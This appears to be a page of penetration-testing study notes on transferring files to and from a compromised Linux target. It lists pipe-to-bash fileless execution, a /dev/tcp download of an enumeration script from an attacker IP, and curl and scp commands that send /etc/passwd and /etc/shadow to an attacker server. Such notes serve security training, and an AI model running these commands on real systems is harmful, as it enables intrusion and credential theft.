Linux Target

Download Operations (Attacker -> Target)

Base64 Encoding and Decoding

If you have access toa terminal on the target, you can just paste base64 into it and decode it

Web Downloads with Wget and cURL

wget <URL> -O <PATH_OUTPUT>

curl -o <PATH_OUTPUT> <URL>

Fileless

Because of the way Linux works and how pipes operate, most of the tools we use in Linux can be used to replicate fileless operations, which means that we don't have to download a file to execute it.

Some payloads such as mkfifo write files to disk. Keep in mind that while the execution of the payload may be fileless when you use a pipe, depending on the payload chosen it may create temporary files on the OS.

Fileless Download with cURL

curl <URL> | bash

wget -qO- <URL> | python3

Download with Bash (/dev/tcp)

There may also be situations where none of the well-known file transfer tools are available. As long as Bash version 2.04 or greater is installed (compiled with --enable-net-redirections), the built-in /dev/TCP device file can be used for simple file downloads.

exec 3<>/dev/tcp/10.10.10.32/80

echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3

cat <&3

SSH Downloads

On the Attacker machine install and/or enable SSH

sudo systemctl enable ssh

sudo systemctl start ssh

On the Target machine:

scp [email protected]:/root/myroot.txt .

You can create a temporary user account for file transfers and avoid using your primary credentials or keys on a remote computer.

Upload Operations (Target -> Attacker)

Web Upload

Same method as in Windows by creating an http server that allows uploads:

sudo python3 -m pip install --user uploadserver

we can add to it a self-signed certificate:

openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'

(The webserver should not host the certificate. We recommend creating a new directory to host the file for our webserver)

sudo python3 -m uploadserver 443 --server-certificate ~/server.pem

Finally let's upload multiple files in one request, from the Target machine run:

curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure

We used the option --insecure because we used a self-signed certificate that we trust.

Alternative Web File Transfer Method

Since Linux distributions usually have Python or php installed, starting a web server to transfer files is straightforward. Also, if the server we compromised is a web server, we can move the files we want to transfer to the web server directory and access them from the web page, which means that we are downloading the file from our Pwnbox.

python3 -m http.server

python2.7 -m SimpleHTTPServer

php -S 0.0.0.0:8000

ruby -run -ehttpd . -p8000

Then download the file normally from the Attacker machine

SCP Upload

scp /etc/passwd <username>@<IP>:/home/kali/

PreviousWindows Target NextTransferring Files with Code

Last updated 9 months ago